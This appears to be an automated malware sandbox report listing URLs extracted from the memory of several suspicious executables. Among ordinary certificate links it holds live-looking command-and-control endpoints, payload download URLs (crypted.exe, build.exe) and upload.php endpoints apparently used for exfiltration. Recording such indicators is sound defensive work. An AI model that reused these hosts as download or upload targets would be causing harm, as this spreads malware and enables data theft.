Source: Hkbsse.exe, 00000015.00000002.2749654758.0000000001186000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.26/Dem7kTu/index.php3tWjeVNxOQMC9yXs3RYp1LV=ex.phph
Source: Hkbsse.exe, 00000015.00000002.2749654758.0000000001186000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.26/Dem7kTu/index.php3tWjeVNxOQMC9yXs3RYp1LV=ex.phpr
Source: Hkbsse.exe, 00000015.00000002.2749654758.0000000001186000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.26/Dem7kTu/index.php4
Source: Hkbsse.exe, 00000015.00000002.2749654758.0000000001186000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.26/Dem7kTu/index.php6/Dem7kTu/index.php
Source: Hkbsse.exe, 00000015.00000002.2749654758.0000000001186000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.26/Dem7kTu/index.php?
Source: Hkbsse.exe, 00000015.00000002.2749654758.0000000001186000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.26/Dem7kTu/index.phpB
Source: Hkbsse.exe, 00000015.00000002.2749654758.0000000001186000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.26/Dem7kTu/index.phpD
Source: Hkbsse.exe, 00000015.00000002.2749654758.0000000001186000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.26/Dem7kTu/index.phpF-8
Source: Hkbsse.exe, 00000015.00000002.2749654758.0000000001186000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.26/Dem7kTu/index.phpG
Source: Hkbsse.exe, 00000015.00000002.2749654758.0000000001186000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.26/Dem7kTu/index.phpJ
Source: Hkbsse.exe, 00000015.00000002.2749654758.0000000001186000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.26/Dem7kTu/index.phpR
Source: Hkbsse.exe, 00000015.00000002.2749654758.0000000001186000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.26/Dem7kTu/index.phpY
Source: Hkbsse.exe, 00000015.00000002.2749654758.0000000001186000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.26/Dem7kTu/index.phpb
Source: Hkbsse.exe, 00000015.00000002.2749654758.0000000001186000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.26/Dem7kTu/index.phpe
Source: Hkbsse.exe, 00000015.00000002.2749654758.0000000001186000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.26/Dem7kTu/index.phph
Source: Hkbsse.exe, 00000015.00000002.2749654758.0000000001148000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.26/Dem7kTu/index.phpy
Source: axplong.exe, 00000007.00000002.2766434406.0000000000C00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.26/Nework.exe
Source: axplong.exe, 00000007.00000002.2766434406.0000000000C00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.26/Nework.exeT
Source: Hkbsse.exe, 00000015.00000002.2749654758.0000000001186000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.26/ws
Source: svchost015.exe, 00000019.00000002.2438595285.000000000043C000.00000040.00000400.00020000.00000000.sdmp, svchost015.exe, 00000019.00000002.2456504727.00000000009FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.158
Source: svchost015.exe, 00000019.00000002.2456504727.0000000000A42000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 00000019.00000002.2456504727.00000000009FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.158/
Source: svchost015.exe, 00000019.00000002.2456504727.0000000000A5C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.158/3836fd5700214436/freebl3.dll
Source: svchost015.exe, 00000019.00000002.2456504727.0000000000A5C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.158/3836fd5700214436/mozglue.dll
Source: svchost015.exe, 00000019.00000002.2456504727.0000000000A5C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.158/3836fd5700214436/msvcp140.dll
Source: svchost015.exe, 00000019.00000002.2456504727.0000000000A5C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.158/3836fd5700214436/msvcp140.dll:
Source: svchost015.exe, 00000019.00000002.2456504727.0000000000A42000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 00000019.00000002.2456504727.00000000009FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.158/3836fd5700214436/nss3.dll
Source: svchost015.exe, 00000019.00000002.2456504727.0000000000A5C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.158/3836fd5700214436/softokn3.dll
Source: svchost015.exe, 00000019.00000002.2438595285.000000000046A000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.158/3836fd5700214436/sqlite3.dll
Source: svchost015.exe, 00000019.00000002.2456504727.0000000000A5C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.158/3836fd5700214436/sqlite3.dllr
Source: svchost015.exe, 00000019.00000002.2456504727.0000000000A42000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.158/3836fd5700214436/vcruntime140.dll
Source: svchost015.exe, 00000019.00000002.2456504727.0000000000A42000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.158/O
Source: svchost015.exe, 00000019.00000002.2536441815.0000000027160000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.158/e96ea2db21fa9a1b.php
Source: svchost015.exe, 00000019.00000002.2456504727.0000000000A42000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.158/e96ea2db21fa9a1b.php:
Source: svchost015.exe, 00000019.00000002.2456504727.0000000000A42000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.158/e96ea2db21fa9a1b.phpG
Source: svchost015.exe, 00000019.00000002.2456504727.0000000000A5C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.158/e96ea2db21fa9a1b.phpT
Source: svchost015.exe, 00000019.00000002.2536441815.0000000027160000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.158/e96ea2db21fa9a1b.phpdllt
Source: svchost015.exe, 00000019.00000002.2456504727.0000000000A5C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.158/e96ea2db21fa9a1b.phpinomi
Source: svchost015.exe, 00000019.00000002.2456504727.0000000000A42000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.158/e96ea2db21fa9a1b.phpk
Source: svchost015.exe, 00000019.00000002.2438595285.00000000005AD000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.158/e96ea2db21fa9a1b.phption:
Source: svchost015.exe, 00000019.00000002.2456504727.0000000000A5C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.158/e96ea2db21fa9a1b.phpwser
Source: svchost015.exe, 00000019.00000002.2438595285.00000000005AD000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.158HIJJ
Source: axplong.exe, 00000007.00000002.2766434406.0000000000C00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://aia.entrust.net/ts1-chain256.cer01
Source: mozglue[1].dll.25.dr, nss3[1].dll.25.dr, nss3[1].dll.22.dr, freebl3[1].dll.22.dr, softokn3[1].dll.22.dr, mozglue[1].dll.22.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: mozglue[1].dll.25.dr, nss3[1].dll.25.dr, nss3[1].dll.22.dr, freebl3[1].dll.22.dr, softokn3[1].dll.22.dr, mozglue[1].dll.22.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: mozglue[1].dll.25.dr, nss3[1].dll.25.dr, nss3[1].dll.22.dr, freebl3[1].dll.22.dr, softokn3[1].dll.22.dr, mozglue[1].dll.22.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: axplong.exe, 00000007.00000002.2766434406.0000000000C00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: mozglue[1].dll.25.dr, nss3[1].dll.25.dr, nss3[1].dll.22.dr, freebl3[1].dll.22.dr, softokn3[1].dll.22.dr, mozglue[1].dll.22.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: axplong.exe, 00000007.00000002.2766434406.0000000000C00000.00000004.00000020.00020000.00000000.sdmp, mozglue[1].dll.25.dr, nss3[1].dll.25.dr, nss3[1].dll.22.dr, freebl3[1].dll.22.dr, softokn3[1].dll.22.dr, mozglue[1].dll.22.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: axplong.exe, 00000007.00000002.2766434406.0000000000C45000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000018.00000002.2259797317.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, 1[1].exe.7.dr	String found in binary or memory: http://cert.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.cer0Q
Source: axplong.exe, 00000007.00000002.2766434406.0000000000C00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: axplong.exe, 00000007.00000002.2766434406.0000000000C00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/ts1ca.crl0
Source: axplong.exe, 00000007.00000002.2766434406.0000000000C45000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000018.00000002.2259797317.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, 1[1].exe.7.dr	String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: mozglue[1].dll.25.dr, nss3[1].dll.25.dr, nss3[1].dll.22.dr, freebl3[1].dll.22.dr, softokn3[1].dll.22.dr, mozglue[1].dll.22.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: mozglue[1].dll.25.dr, nss3[1].dll.25.dr, nss3[1].dll.22.dr, freebl3[1].dll.22.dr, softokn3[1].dll.22.dr, mozglue[1].dll.22.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: mozglue[1].dll.25.dr, nss3[1].dll.25.dr, nss3[1].dll.22.dr, freebl3[1].dll.22.dr, softokn3[1].dll.22.dr, mozglue[1].dll.22.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: axplong.exe, 00000007.00000002.2766434406.0000000000C00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: mozglue[1].dll.25.dr, nss3[1].dll.25.dr, nss3[1].dll.22.dr, freebl3[1].dll.22.dr, softokn3[1].dll.22.dr, mozglue[1].dll.22.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: axplong.exe, 00000007.00000002.2766434406.0000000000C00000.00000004.00000020.00020000.00000000.sdmp, mozglue[1].dll.25.dr, nss3[1].dll.25.dr, nss3[1].dll.22.dr, freebl3[1].dll.22.dr, softokn3[1].dll.22.dr, mozglue[1].dll.22.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: mozglue[1].dll.25.dr, nss3[1].dll.25.dr, nss3[1].dll.22.dr, freebl3[1].dll.22.dr, softokn3[1].dll.22.dr, mozglue[1].dll.22.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: mozglue[1].dll.25.dr, nss3[1].dll.25.dr, nss3[1].dll.22.dr, freebl3[1].dll.22.dr, softokn3[1].dll.22.dr, mozglue[1].dll.22.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: mozglue[1].dll.25.dr, nss3[1].dll.25.dr, nss3[1].dll.22.dr, freebl3[1].dll.22.dr, softokn3[1].dll.22.dr, mozglue[1].dll.22.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: axplong.exe, 00000007.00000002.2766434406.0000000000C00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: mozglue[1].dll.25.dr, nss3[1].dll.25.dr, nss3[1].dll.22.dr, freebl3[1].dll.22.dr, softokn3[1].dll.22.dr, mozglue[1].dll.22.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: axplong.exe, 00000007.00000002.2766434406.0000000000C45000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000018.00000002.2259797317.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, 1[1].exe.7.dr	String found in binary or memory: http://crls.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.crl0
Source: axplong.exe, 00000007.00000002.2766434406.0000000000C45000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000018.00000002.2259797317.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, 1[1].exe.7.dr	String found in binary or memory: http://crls.ssl.com/ssl.com-rsa-RootCA.crl0
Source: axplong.exe, 00000007.00000002.2766434406.0000000000C45000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000018.00000002.2259797317.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, 1[1].exe.7.dr	String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: axplong.exe, 00000007.00000002.2766434406.0000000000BB6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddl.safone.dev/3823166/crypted.exe?hash=AgADZl
Source: axplong.exe, 00000007.00000002.2766434406.0000000000BA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddl.safone.dev/3823166/crypted.exe?hash=AgADZlqos.dll
Source: axplong.exe, 00000007.00000002.2766434406.0000000000C00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddl.safone.dev/3840509/build.exe?hash=AgADNBS
Source: axplong.exe, 00000007.00000002.2766434406.0000000000BE8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddl.safone.dev/3840509/build.exe?hash=AgADNBzWZ
Source: axplong.exe, 00000007.00000002.2766434406.0000000000C00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddl.safone.dev/3846244/1.exe?hash=AgADek
Source: axplong.exe, 00000007.00000002.2766434406.0000000000BB6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddl.safone.dev/3846636/Set-up.exe?hash=AgADDB
Source: axplong.exe, 00000007.00000002.2766434406.0000000000BB6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddl.safone.dev/3846636/Set-up.exe?hash=AgADDBu%
Source: axplong.exe, 00000007.00000002.2766434406.0000000000C00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddl.safone.dev/3858015/Setup.exe?hash=AgADYg#
Source: axplong.exe, 00000007.00000002.2766434406.0000000000BE8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddl.safone.dev/3858015/Setup.exe?hash=AgADYgdWh
Source: RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
Source: RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
Source: RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
Source: RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
Source: RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
Source: RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
Source: RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
Source: RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
Source: RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
Source: RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
Source: RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
Source: RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
Source: RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
Source: RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
Source: RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
Source: RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
Source: RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
Source: Setup.exe, 0000001A.00000003.2692200875.0000000001357000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 0000001A.00000002.2776704139.000000000136B000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 0000001A.00000003.2411332173.0000000001357000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 0000001A.00000002.2776704139.0000000001357000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://fivexv5pn.top/
Source: Setup.exe, 0000001A.00000002.2776704139.000000000136B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://fivexv5pn.top/8
Source: Setup.exe, 0000001A.00000002.2776704139.000000000136B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://fivexv5pn.top/8IY
Source: Setup.exe, 0000001A.00000002.2776704139.000000000136B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://fivexv5pn.top/BY
Source: Setup.exe, 0000001A.00000002.2775174475.000000000132D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://fivexv5pn.top/l3
Source: Setup.exe, 0000001A.00000002.2776704139.0000000001371000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://fivexv5pn.top/v1/upload.php
Source: Setup.exe, 0000001A.00000003.2692200875.0000000001357000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 0000001A.00000002.2776704139.0000000001357000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://fivexv5pn.top/v1/upload.phpDCPE
Source: Setup.exe, 0000001A.00000003.2692200875.0000000001357000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 0000001A.00000002.2776704139.0000000001357000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://fivexv5pn.top/v1/upload.phpZCFE
Source: Setup.exe, 0000001A.00000002.2775174475.000000000132D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://fivexv5pn.top/v1/upload.phpr_
Source: Set-up.exe, 00000017.00000002.2762123605.0000000001352000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://fivexv5vs.top/
Source: Set-up.exe, 00000017.00000002.2762123605.0000000001352000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://fivexv5vs.top/0
Source: Set-up.exe, 00000017.00000002.2762123605.00000000013F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://fivexv5vs.top/2
Source: Set-up.exe, 00000017.00000002.2762123605.00000000013F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://fivexv5vs.top/5
Source: Set-up.exe, 00000017.00000002.2762123605.0000000001352000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://fivexv5vs.top/;
Source: Set-up.exe, 00000017.00000002.2762123605.00000000013F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://fivexv5vs.top/J
Source: Set-up.exe, 00000017.00000002.2762123605.00000000013F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://fivexv5vs.top/Q
Source: Set-up.exe, 00000017.00000002.2762123605.0000000001352000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://fivexv5vs.top/W
Source: Set-up.exe, 00000017.00000002.2762123605.00000000013F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://fivexv5vs.top/f
Source: Set-up.exe, 00000017.00000002.2762123605.0000000001352000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://fivexv5vs.top/o
Source: Set-up.exe, 00000017.00000002.2762123605.00000000013F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://fivexv5vs.top/t
Source: Set-up.exe, 00000017.00000002.2762123605.0000000001352000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000017.00000002.2762123605.000000000132E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://fivexv5vs.top/v1/upload.php
Source: Set-up.exe, 00000017.00000002.2762123605.0000000001352000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://fivexv5vs.top/v1/upload.php:
Source: Set-up.exe, 00000017.00000002.2762123605.00000000013C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://fivexv5vs.top/v1/upload.php?
Source: Set-up.exe, 00000017.00000002.2762123605.0000000001352000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://fivexv5vs.top/v1/upload.phpV
Source: Set-up.exe, 00000017.00000002.2762123605.0000000001352000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://fivexv5vs.top/v1/upload.phpw
Source: axplong.exe, 00000007.00000002.2766434406.0000000000C00000.00000004.00000020.00020000.00000000.sdmp, mozglue[1].dll.25.dr, nss3[1].dll.25.dr, nss3[1].dll.22.dr, freebl3[1].dll.22.dr, softokn3[1].dll.22.dr, mozglue[1].dll.22.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: axplong.exe, 00000007.00000002.2766434406.0000000000C00000.00000004.00000020.00020000.00000000.sdmp, mozglue[1].dll.25.dr, nss3[1].dll.25.dr, nss3[1].dll.22.dr, freebl3[1].dll.22.dr, softokn3[1].dll.22.dr, mozglue[1].dll.22.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: mozglue[1].dll.25.dr, nss3[1].dll.25.dr, nss3[1].dll.22.dr, freebl3[1].dll.22.dr, softokn3[1].dll.22.dr, mozglue[1].dll.22.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: mozglue[1].dll.25.dr, nss3[1].dll.25.dr, nss3[1].dll.22.dr, freebl3[1].dll.22.dr, softokn3[1].dll.22.dr, mozglue[1].dll.22.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: mozglue[1].dll.25.dr, nss3[1].dll.25.dr, nss3[1].dll.22.dr, freebl3[1].dll.22.dr, softokn3[1].dll.22.dr, mozglue[1].dll.22.dr	String found in binary or memory: http://ocsp.digicert.com0X
